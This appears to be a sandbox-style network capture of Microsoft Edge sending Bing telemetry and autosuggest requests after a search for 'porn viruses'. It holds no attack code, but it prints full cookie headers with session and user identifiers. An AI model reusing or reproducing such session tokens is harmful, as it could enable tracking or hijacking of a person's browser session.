GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144333.184e9502
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332447%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332447%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144333.184e96b8
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1728144333126%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144333256%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144333508%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%2Cig%3A671C458530CA49EAB145F7E69517C1CF%22%2C%22AnswerInfo%22%3Anull%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144333513%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334252%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334269%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1728144333126%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144333256%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144333508%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%2Cig%3A671C458530CA49EAB145F7E69517C1CF%22%2C%22AnswerInfo%22%3Anull%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144333513%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334252%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334269%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:35 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144335.184e9796
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viru&cp=9&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viru&cp=9&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 80
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163cfb4824424945827e8d1a0570c
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ADZw1rw3sDi6jVb8dyLz//g4zuhNmgELujsOLC06x5A='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:35 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144335.184ea4ed
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144334479%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334823%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334861%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334869%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334912%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335008%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335061%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335081%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335083%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335238%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335483%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144334479%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334823%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334861%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334869%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334912%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335008%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335061%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335081%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335083%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335238%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335483%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:36 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144336.184ea66b
GET

